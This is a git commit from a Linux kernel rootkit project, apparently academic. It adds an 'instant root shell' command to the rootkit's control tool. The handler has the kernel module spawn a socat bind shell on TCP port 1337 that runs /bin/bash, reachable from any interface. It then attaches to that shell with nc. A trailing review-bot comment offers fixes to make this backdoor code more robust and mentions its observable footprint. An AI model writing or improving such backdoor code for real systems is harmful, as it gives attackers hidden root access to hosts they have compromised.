linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 997e825167419bcf5ebffe7f34d1110f2fd50132
parent 38b7b71a3508188084ffdf34a0c57f638955f5f4
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 27 Nov 2020 12:08:30 +0100

adds instant root shell command

Diffstat:
Msrc/rkctl/rkctl.c | 23+++++++++++++++++++++++
Msrc/rkctl/rkctl.h | 1+
2 files changed, 24 insertions(+), 0 deletions(-)

diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -52,6 +52,10 @@ parse_input(int argc, char **argv)
 return (cmd_t){ handle_backdoor, (void *)argv[2] };
 }
 
+ if (ARGVCMP(1, "shell")) {
+ return (cmd_t){ handle_shellbd, NULL };
+ }
+
 if (ARGVCMP(1, "backdoor-use-tty")) {
 ASSERT_ARGC(2, "backdoor-use-tty <0 | 1>");
 // TODO: return backdoor-use-tty handle
@@ -85,6 +89,25 @@ handle_backdoor(void *arg)
 }
 
 int
+handle_shellbd(void *arg)
+{
+ const char *socat_cmd = "socat tcp4-listen:1337,reuseaddr,fork"
+ " exec:/bin/bash,pty,stderr,setsid";
+
+ int ret = issue_ioctl(G7_BACKDOOR, socat_cmd);
+
+ char *argv[] = {
+ "nc",
+ "127.0.0.1",
+ "1337",
+ NULL
+ };
+
+ execve(argv[0], argv, NULL);
+ return ret;
+}
+
+int
 handle_togglebd(void *arg)
 {
 }
diff --git a/src/rkctl/rkctl.h b/src/rkctl/rkctl.h
@@ -23,6 +23,7 @@ void help();
 int handle_ping(void *);
 int handle_filehide(void *);
 int handle_backdoor(void *);
+int handle_shellbd(void *);
 int handle_togglebd(void *);
 int handle_hidepid(void *);
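Review bot: In `handle_shellbd` the result of `issue_ioctl` is stored in `ret` but never examined before `execve`, and `execve`'s own failure is dropped, so on a failed exec the function falls through to `return ret` and reports the ioctl status rather than the exec error, while on a failed ioctl it still execs a client toward a listener that was never started. Guard the exec on the ioctl outcome and surface the exec failure, e.g. `if (ret < 0) return ret;` before the exec and `perror("execve"); return -1;` after it (what `issue_ioctl` returns on failure is not visible in this hunk, so the comparison may need adjusting to its convention). `arg` is unused; `(void)arg;` at the top would silence the warning and match the `void *` handler signature the other handlers share. A header comment is also missing; something like `/* Asks the module to start the socat listener on TCP 1337, then replaces this process with the nc client; only returns if the exec fails. */` would make the control flow clear. Worth noting for anyone triaging a host with this module loaded: the listener spec `tcp4-listen:1337,reuseaddr,fork` is not restricted to loopback even though the client only ever connects to 127.0.0.1, so a socat process listening on TCP 1337 and spawning `/bin/bash` on a pty is the observable artifact of this command.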